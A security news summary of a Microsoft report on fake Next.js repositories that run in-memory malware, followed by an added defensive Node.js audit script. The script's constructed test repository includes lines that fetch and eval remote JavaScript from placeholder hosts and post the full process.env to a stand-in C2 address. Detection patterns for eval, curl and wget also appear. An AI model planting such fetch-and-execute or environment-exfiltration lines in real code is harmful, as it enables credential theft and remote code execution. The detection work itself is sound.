thehackernews.com 2/26/2026, 11:25:39 AM · via preferred

Fake Next.js repos lure developers and run malware in memory

Primary source: microsoft.com

Microsoft warns developers about fake Next[.]js repositories that deliver in‑memory malware, disguised as legitimate projects and assessments to gain persistent access. According to the Microsoft Defender Security Research Team, the campaign uses multiple entry points on trusted platforms, with attacker‑controlled JavaScript retrieved at runtime and executed to facilitate command‑and‑control. The repositories often appear on Bitbucket under names such as “Cryptan-Platform-MVP1” to lure developers into running them as part of an assessment.

Three execution paths have been identified: Visual Studio Code workspace execution that fetches malicious code from a Vercel domain; build‑time execution triggered when developers run npm run dev, loading a JavaScript loader from Vercel; and server startup execution where a backend module executes hidden loader logic and exfiltrates environment data for in‑memory code execution.
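As an added, defender-side example (not code from the article or from Microsoft's report), the following Node.js script audits a cloned repository for the three execution paths the article describes before anyone opens it in VS Code or runs npm run dev. The VS Code check assumes the standard workspace mechanism of a tasks.json task whose runOptions.runOn is "folderOpen"; the article does not say which VS Code feature the campaign used. The npm and source-file rules are generic heuristics for remote-fetch-and-execute code and for process.env being read next to an outbound request. The sample repository, its file names and the example.invalid hosts are constructed for the demonstration.

```javascript
// Added example, not code from the article or from Microsoft's report.
// Pre-run audit for a cloned Node/Next.js repository, modelled on the three
// execution paths the article lists:
//   (1) VS Code workspace tasks that start as soon as the folder is opened
//       (assumption: the standard tasks.json "runOn": "folderOpen" mechanism),
//   (2) npm scripts, including implicit pre/post hooks such as "predev", that
//       download or eval code when a developer runs `npm run dev`,
//   (3) server-side source that fetches JavaScript at runtime, executes it in
//       memory, and reads process.env near an outbound request.
// Files are supplied as a { relativePath: contents } map so the audit runs
// offline; loadRepo() builds that map from a real checkout.

// Patterns for code executed from a string (in-memory execution).
const EXEC_FROM_STRING = [
  /\beval\s*\(/,
  /new\s+Function\s*\(/,
  /\bvm\.(runInThisContext|runInNewContext|Script)\b/,
];
// Patterns for fetching a remote resource.
const REMOTE_FETCH = [
  /\bfetch\s*\(\s*["'`]https?:/,
  /\bhttps?\.(get|request)\s*\(/,
  /\baxios\b/,
  /\b(curl|wget)\b/,
];
// process.env within a few hundred characters of an outbound request, either order.
const ENV_NEAR_REQUEST = [
  /process\.env\b[\s\S]{0,300}\b(fetch|https?\.(get|request)|axios)\s*\(/,
  /\b(fetch|https?\.(get|request)|axios)\s*\([\s\S]{0,300}process\.env\b/,
];
const SOURCE_EXT = /\.(c|m)?jsx?$|\.tsx?$/;

function parseJson(text) {
  // tasks.json may contain // comments (JSONC); strip whole-line ones before parsing.
  try { return JSON.parse(text.replace(/^\s*\/\/.*$/gm, "")); } catch { return null; }
}

// (1) VS Code tasks configured to start automatically when the folder opens.
function checkVsCodeTasks(files) {
  const findings = [];
  const tasks = files[".vscode/tasks.json"] ? parseJson(files[".vscode/tasks.json"]) : null;
  if (!tasks || !Array.isArray(tasks.tasks)) return findings;
  for (const t of tasks.tasks) {
    if (t.runOptions && t.runOptions.runOn === "folderOpen") {
      findings.push({ path: ".vscode/tasks.json", rule: "vscode-auto-task",
        detail: `task "${t.label}" runs on folder open: ${t.command}` });
    }
  }
  return findings;
}

// (2) npm scripts that pull code from the network or execute inline code.
function checkNpmScripts(files) {
  const findings = [];
  const pkg = files["package.json"] ? parseJson(files["package.json"]) : null;
  if (!pkg || typeof pkg.scripts !== "object" || pkg.scripts === null) return findings;
  for (const [name, cmd] of Object.entries(pkg.scripts)) {
    const remote = REMOTE_FETCH.some((re) => re.test(cmd));
    const inline = /\bnode\s+(-e|--eval)\b/.test(cmd) || /\|\s*(sh|bash|node)\b/.test(cmd);
    if (!remote && !inline) continue;
    // "predev" runs implicitly before "dev", so flag the hook relationship.
    const base = name.replace(/^(pre|post)/, "");
    const hook = base !== name && base in pkg.scripts ? ` (runs implicitly with "${base}")` : "";
    findings.push({ path: "package.json", rule: "npm-script-remote-exec", detail: `${name}${hook}: ${cmd}` });
  }
  return findings;
}

// (3) Source files that fetch JavaScript at runtime and execute it, or that
// read process.env right next to an outbound request.
function checkSources(files) {
  const findings = [];
  for (const [p, text] of Object.entries(files)) {
    if (!SOURCE_EXT.test(p)) continue;
    const fetches = REMOTE_FETCH.some((re) => re.test(text));
    const execs = EXEC_FROM_STRING.some((re) => re.test(text));
    if (fetches && execs) {
      findings.push({ path: p, rule: "runtime-fetch-and-exec", detail: "remote fetch combined with eval/new Function/vm" });
    }
    if (ENV_NEAR_REQUEST.some((re) => re.test(text))) {
      findings.push({ path: p, rule: "env-exfil", detail: "process.env read within 300 chars of an outbound request" });
    }
  }
  return findings;
}

function auditRepo(files) {
  return [...checkVsCodeTasks(files), ...checkNpmScripts(files), ...checkSources(files)];
}

// Build the file map from a real checkout (skips node_modules and .git).
function loadRepo(root) {
  const fs = require("fs");
  const path = require("path");
  const files = {};
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      if (entry.name === "node_modules" || entry.name === ".git") continue;
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) walk(full);
      else files[path.relative(root, full).split(path.sep).join("/")] = fs.readFileSync(full, "utf8");
    }
  };
  walk(root);
  return files;
}

// Constructed sample repository exhibiting all three paths; the hostnames are
// placeholders under .invalid and resolve nowhere.
const SAMPLE_REPO = {
  ".vscode/tasks.json": JSON.stringify({
    version: "2.0.0",
    tasks: [{ label: "setup", type: "shell", command: "node .vscode/setup.js",
              runOptions: { runOn: "folderOpen" } }],
  }),
  "package.json": JSON.stringify({
    name: "sample-app",
    scripts: {
      dev: "next dev",
      predev: "node -e \"fetch('https://loader.example.invalid/l.js').then(r=>r.text()).then(eval)\"",
    },
  }),
  "server/start.js": [
    "const r = await fetch('https://loader.example.invalid/s.js');",
    "new Function(await r.text())();",
    "const env = process.env;",
    "fetch('https://c2.example.invalid/', { method: 'POST', body: JSON.stringify(env) });",
  ].join("\n"),
  "pages/index.js": "export default function Home() { return <h1>Hello</h1>; }",
};
```

Running auditRepo(SAMPLE_REPO) yields four findings, one per planted indicator, and none for the ordinary Next.js page; auditRepo(loadRepo("/path/to/checkout")) applies the same rules to a real clone. The heuristics are deliberately coarse: a match is a reason to read the flagged file before running anything, not proof of compromise, and a repository that passes can still hide loader logic behind dependencies the audit does not inspect.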

While Microsoft stops short of attributing a specific actor, the method aligns with North Korea‑linked groups behind Contagious Interview, according to the report. GitLab noted that 131 unique accounts distributing malicious projects were banned, highlighting the broader ecosystem risks developers face.


Article by CyberSIXT